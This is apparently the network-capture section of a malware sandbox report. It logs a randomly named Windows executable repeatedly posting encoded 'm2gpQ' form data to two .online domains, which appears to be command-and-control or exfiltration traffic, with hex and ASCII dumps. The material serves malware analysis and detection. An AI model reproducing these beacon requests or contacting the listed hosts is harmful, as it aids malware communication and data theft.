Nov 12, 2024 07:57:27.404635906 CET	773	OUT	POST /znb6/ HTTP/1.1 Host: www.wethebeststore.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.wethebeststore.online Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.wethebeststore.online/znb6/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 31 78 55 70 79 38 45 42 4c 6b 43 76 57 30 38 6c 34 4f 56 6b 6b 55 57 41 52 59 59 4e 51 7a 73 57 72 63 31 70 2b 4c 76 78 4e 73 50 79 63 51 47 4f 59 59 44 79 34 69 66 30 78 62 48 64 7a 42 74 33 36 35 31 33 44 75 72 33 2f 4f 4a 30 4a 41 63 41 35 4d 4f 2b 4e 69 7a 37 64 37 33 6a 4f 44 6e 2f 72 56 44 34 4f 73 43 55 46 30 39 4f 72 75 43 6e 32 6d 4b 67 63 48 36 61 4c 37 63 39 51 73 69 5a 74 6e 4e 30 4c 52 66 44 66 50 77 6c 50 62 72 78 70 45 7a 4a 57 52 70 6b 35 49 44 34 38 79 63 32 5a 35 64 59 4e 52 34 7a 38 43 77 72 63 45 61 6f 34 34 31 76 31 58 53 48 58 7a 30 41 49 4d 4c 4c 64 65 32 6e 72 2f 71 33 6e 54 51 47 5a 79 36 7a 6a 67 3d 3d Data Ascii: m2gpQ=1xUpy8EBLkCvW08l4OVkkUWARYYNQzsWrc1p+LvxNsPycQGOYYDy4if0xbHdzBt36513Dur3/OJ0JAcA5MO+Niz7d73jODn/rVD4OsCUF09OruCn2mKgcH6aL7c9QsiZtnN0LRfDfPwlPbrxpEzJWRpk5ID48yc2Z5dYNR4z8CwrcEao441v1XSHXz0AIMLLde2nr/q3nTQGZy6zjg==
Nov 12, 2024 07:57:28.214262009 CET	500	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 06:57:28 GMT Server: Apache X-Xss-Protection: 1; mode=block Referrer-Policy: no-referrer-when-downgrade X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.7	50012	91.184.0.200	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:57:29.947841883 CET	793	OUT	POST /znb6/ HTTP/1.1 Host: www.wethebeststore.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.wethebeststore.online Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.wethebeststore.online/znb6/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 31 78 55 70 79 38 45 42 4c 6b 43 76 58 58 6b 6c 39 74 39 6b 31 30 57 50 4e 6f 59 4e 46 44 73 53 72 63 35 70 2b 4b 36 38 4e 61 66 79 63 30 43 4f 62 61 72 79 72 53 66 30 70 4c 48 59 35 68 73 37 36 35 35 46 44 76 48 33 2f 4b 68 30 4a 42 73 41 6c 74 4f 39 4e 79 7a 39 57 62 33 74 4b 44 6e 2f 72 56 44 34 4f 6f 69 75 46 77 52 4f 71 66 79 6e 33 45 79 76 44 33 36 56 61 37 63 39 64 4d 69 56 74 6e 4d 52 4c 51 7a 70 66 4e 34 6c 50 62 37 78 71 56 7a 4f 66 52 70 2b 39 49 43 70 2f 33 39 65 5a 38 74 6b 45 52 6c 79 79 6a 73 7a 5a 79 62 4b 69 61 35 44 72 47 71 38 54 78 51 32 66 71 57 2b 66 66 79 2f 6d 64 65 57 34 6b 31 73 55 67 62 33 31 65 50 72 6c 6c 7a 55 43 52 4e 42 6e 41 63 4c 30 4f 70 6b 44 41 77 3d Data Ascii: m2gpQ=1xUpy8EBLkCvXXkl9t9k10WPNoYNFDsSrc5p+K68Nafyc0CObaryrSf0pLHY5hs7655FDvH3/Kh0JBsAltO9Nyz9Wb3tKDn/rVD4OoiuFwROqfyn3EyvD36Va7c9dMiVtnMRLQzpfN4lPb7xqVzOfRp+9ICp/39eZ8tkERlyyjszZybKia5DrGq8TxQ2fqW+ffy/mdeW4k1sUgb31ePrllzUCRNBnAcL0OpkDAw=
Nov 12, 2024 07:57:30.756568909 CET	500	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 06:57:30 GMT Server: Apache X-Xss-Protection: 1; mode=block Referrer-Policy: no-referrer-when-downgrade X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.7	50013	91.184.0.200	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:57:32.503850937 CET	1806	OUT	POST /znb6/ HTTP/1.1 Host: www.wethebeststore.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.wethebeststore.online Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.wethebeststore.online/znb6/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 31 78 55 70 79 38 45 42 4c 6b 43 76 58 58 6b 6c 39 74 39 6b 31 30 57 50 4e 6f 59 4e 46 44 73 53 72 63 35 70 2b 4b 36 38 4e 61 58 79 64 48 4b 4f 59 39 66 79 6f 53 66 30 67 72 48 5a 35 68 74 68 36 35 77 4f 44 76 37 6e 2f 4d 6c 30 49 6d 45 41 70 4f 57 39 47 79 7a 39 4c 4c 33 67 4f 44 6e 71 72 56 54 38 4f 73 4f 75 46 77 52 4f 71 63 71 6e 33 57 4b 76 46 33 36 61 4c 37 63 50 51 73 6a 4b 74 6e 45 72 4c 51 48 54 66 65 67 6c 42 62 4c 78 6f 6e 4c 4f 43 68 70 34 36 49 43 78 2f 33 35 42 5a 34 4e 47 45 53 34 36 79 68 38 7a 62 58 32 58 6e 71 46 4a 6f 6d 2b 37 66 41 59 45 57 34 4f 4d 64 65 53 45 74 4b 71 54 77 57 31 77 59 68 6e 43 78 4c 57 30 79 32 37 39 48 69 56 77 75 30 6c 63 72 4e 70 6d 56 32 6f 32 49 2b 63 50 4d 30 66 6a 5a 7a 63 54 54 39 62 55 69 39 30 5a 6c 78 4e 48 52 38 39 39 42 55 66 54 77 66 66 65 43 6c 33 30 42 75 57 61 35 47 54 47 39 34 79 2b 64 64 43 4e 71 39 62 57 76 67 38 6a 73 39 33 6b 51 53 52 76 49 71 74 33 31 6a 5a 58 36 6d 6d 77 57 35 6e 71 57 75 44 76 67 61 53 63 77 49 4d 74 [TRUNCATED] Data Ascii: m2gpQ=1xUpy8EBLkCvXXkl9t9k10WPNoYNFDsSrc5p+K68NaXydHKOY9fyoSf0grHZ5hth65wODv7n/Ml0ImEApOW9Gyz9LL3gODnqrVT8OsOuFwROqcqn3WKvF36aL7cPQsjKtnErLQHTfeglBbLxonLOChp46ICx/35BZ4NGES46yh8zbX2XnqFJom+7fAYEW4OMdeSEtKqTwW1wYhnCxLW0y279HiVwu0lcrNpmV2o2I+cPM0fjZzcTT9bUi90ZlxNHR899BUfTwffeCl30BuWa5GTG94y+ddCNq9bWvg8js93kQSRvIqt31jZX6mmwW5nqWuDvgaScwIMtF5QkzSqph/xdax5HCoN8xXa0st2FAoQzhdrVkgcdV32TDOVUXea21lwQMwRHKMd9IcfLUbTTnByhSZzbMogEEZYVGceUzEX/DtnRUXBoGGh0sOIaShCBUq2sCttZn0IKAPLVfw4frH3MALJRhaa122fcujX7m2lvXxKqSO3wNuiX0A4iaYbeW3iF/miA4E/l5IiQj7Gj/oQcZMnBP8/x8mD3E/hDmY+RnFfuCCFCo2Lyvl3zZ8av/bqRDcNagrazdeQERG6G8WlCuBPOrDZvKHwQMlbJGcSJ90CNF9o3KjNu8lPXtZP2EVVtUtWnx4/A6pxpyLoYXzdYX7oDLbloaaplkP7Zke/iCPHR8qLAw3bB8e1w6ZWOrJz0s5jApRQ+MMYEDux6/S+kilHnsE1/PaG/a3CU8MQNg3yGwp+y7PZuB5PtIh3giJ/KYGxbbYzkHCKeYlSal1OC+ACSwk4KkwIM3qet49rFe46gSUAZer+3ECNC5r1tm93DlZk+oUHt/C2zIS1yKtqLC38vjgb5l7c0O2OA84+dlF27Fk3JRmDgBs8d54u1KeWRGK31ZxEfaVkvHsh+Q+I4RlLXnhGNxEGyD+wt0reFeeaOJspbUj48/++LUiP+O9Gme6M6XxgqZMQV8N3DDOoPYTBTefq0Ibibi/HyeYK6NB [TRUNCATED]
Nov 12, 2024 07:57:33.322323084 CET	500	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 06:57:33 GMT Server: Apache X-Xss-Protection: 1; mode=block Referrer-Policy: no-referrer-when-downgrade X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.7	50014	91.184.0.200	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:57:35.054941893 CET	500	OUT	GET /znb6/?m2gpQ=4z8JxI0nRVLXBlRrydZdwmqPRLgcHgod4ZZEwprDCqeuR1X4EJPq9hqUp4XV2iNrlK1zceLjjdxAFB8hiM3pNAL8f7bcCQHaun+lOMiDBkB7id3F4mO5dhanL54VXfzZsnkFdU/HHMoW&KjH=KRIxdVHP60TD8 HTTP/1.1 Host: www.wethebeststore.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Nov 12, 2024 07:57:35.862665892 CET	500	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 06:57:35 GMT Server: Apache X-Xss-Protection: 1; mode=block Referrer-Policy: no-referrer-when-downgrade X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.7	50015	217.160.0.60	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:57:41.090801001 CET	755	OUT	POST /1jhj/ HTTP/1.1 Host: www.solarand.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.solarand.online Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.solarand.online/1jhj/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 56 64 2b 65 68 61 6c 31 6a 56 63 44 56 4d 76 57 72 54 34 36 55 41 4f 68 55 6a 73 49 70 73 6b 51 57 67 46 78 6b 4c 61 63 46 54 73 75 30 4a 65 4e 33 2f 75 50 6f 6d 47 4a 50 59 43 53 37 71 50 37 4e 7a 6d 68 66 62 70 6b 38 2f 68 50 5a 50 73 44 42 31 48 59 30 6e 50 35 77 33 47 42 39 52 6d 37 6d 5a 57 6d 37 4d 33 49 32 54 6d 47 4d 67 34 4e 39 2b 68 74 64 68 42 42 61 74 32 33 61 78 63 50 70 6b 6c 38 78 6e 35 32 56 59 66 2b 5a 57 32 49 52 35 70 49 71 4f 32 36 79 32 45 57 66 2b 69 4c 50 67 7a 67 45 74 41 6e 39 74 76 66 77 42 72 4a 49 63 61 55 61 30 62 63 2f 66 6b 37 66 4b 31 52 7a 61 49 50 34 70 56 6f 30 41 79 63 4a 71 2f 47 6b 51 3d 3d Data Ascii: m2gpQ=Vd+ehal1jVcDVMvWrT46UAOhUjsIpskQWgFxkLacFTsu0JeN3/uPomGJPYCS7qP7Nzmhfbpk8/hPZPsDB1HY0nP5w3GB9Rm7mZWm7M3I2TmGMg4N9+htdhBBat23axcPpkl8xn52VYf+ZW2IR5pIqO26y2EWf+iLPgzgEtAn9tvfwBrJIcaUa0bc/fk7fK1RzaIP4pVo0AycJq/GkQ==
Nov 12, 2024 07:57:41.918091059 CET	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Tue, 12 Nov 2024 06:57:41 GMT Server: Apache Content-Encoding: gzip Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED] Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m\|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H\|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1\|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
Nov 12, 2024 07:57:41.918116093 CET	899	IN	Data Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5 Data Ascii: H\|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.7	50016	217.160.0.60	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:57:43.637901068 CET	775	OUT	POST /1jhj/ HTTP/1.1 Host: www.solarand.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.solarand.online Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.solarand.online/1jhj/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 56 64 2b 65 68 61 6c 31 6a 56 63 44 56 73 2f 57 73 41 41 36 63 41 4f 69 52 6a 73 49 6a 4d 6b 55 57 67 5a 78 6b 4b 65 4d 46 68 49 75 30 74 61 4e 32 2b 75 50 6c 47 47 4a 48 34 43 58 31 4b 4f 57 4e 7a 71 50 66 62 6c 6b 38 2f 6c 50 5a 4c 38 44 42 45 48 62 31 33 50 37 38 58 47 44 7a 78 6d 37 6d 5a 57 6d 37 4d 79 66 32 54 4f 47 4d 51 49 4e 38 66 68 71 51 42 42 43 51 4e 32 33 65 78 63 4c 70 6b 6c 43 78 69 67 68 56 62 6e 2b 5a 53 36 49 51 6f 70 4c 6b 2b 33 7a 39 57 45 41 55 4d 44 39 49 7a 4c 5a 46 38 59 52 35 39 66 43 78 33 71 72 53 2b 57 34 45 6c 6a 6e 37 64 41 4e 49 73 6f 6b 78 62 4d 58 31 4c 68 4a 72 33 58 32 45 34 65 43 79 74 45 39 73 70 46 49 6e 38 54 2b 70 63 6c 46 6b 50 42 6e 4b 64 38 3d Data Ascii: m2gpQ=Vd+ehal1jVcDVs/WsAA6cAOiRjsIjMkUWgZxkKeMFhIu0taN2+uPlGGJH4CX1KOWNzqPfblk8/lPZL8DBEHb13P78XGDzxm7mZWm7Myf2TOGMQIN8fhqQBBCQN23excLpklCxighVbn+ZS6IQopLk+3z9WEAUMD9IzLZF8YR59fCx3qrS+W4Eljn7dANIsokxbMX1LhJr3X2E4eCytE9spFIn8T+pclFkPBnKd8=
Nov 12, 2024 07:57:44.474122047 CET	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Tue, 12 Nov 2024 06:57:44 GMT Server: Apache Content-Encoding: gzip Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED] Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m\|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H\|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1\|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
Nov 12, 2024 07:57:44.474144936 CET	899	IN	Data Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5 Data Ascii: H\|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.7	50017	217.160.0.60	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:57:46.182475090 CET	1788	OUT	POST /1jhj/ HTTP/1.1 Host: www.solarand.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.solarand.online Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.solarand.online/1jhj/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 56 64 2b 65 68 61 6c 31 6a 56 63 44 56 73 2f 57 73 41 41 36 63 41 4f 69 52 6a 73 49 6a 4d 6b 55 57 67 5a 78 6b 4b 65 4d 46 68 41 75 7a 59 4f 4e 32 5a 79 50 6b 47 47 4a 4e 59 43 57 31 4b 50 55 4e 77 61 4c 66 62 34 5a 38 35 35 50 4c 35 30 44 48 32 2f 62 73 6e 50 37 30 33 47 43 39 52 6d 55 6d 59 36 69 37 4e 43 66 32 54 4f 47 4d 54 41 4e 34 4f 68 71 44 78 42 42 61 74 32 7a 61 78 63 7a 70 6b 39 4e 78 6a 78 63 53 71 48 2b 63 43 71 49 57 61 42 4c 69 75 33 39 2b 57 46 44 55 4d 50 75 49 7a 58 37 46 38 74 2b 35 36 7a 43 77 41 4b 77 4d 74 4f 62 51 54 50 59 2f 74 67 53 4c 61 70 5a 7a 37 4a 75 72 4c 4a 38 33 58 76 41 44 65 75 77 78 4b 56 52 79 34 68 39 35 49 7a 46 68 62 63 61 35 2b 5a 48 57 4d 76 64 4a 41 31 66 6e 68 35 31 6c 55 43 2b 63 30 68 4a 62 34 51 6e 53 74 67 75 63 4a 44 77 30 56 34 35 6e 43 6f 4a 7a 61 6a 69 45 53 35 6b 6d 4a 39 47 66 78 36 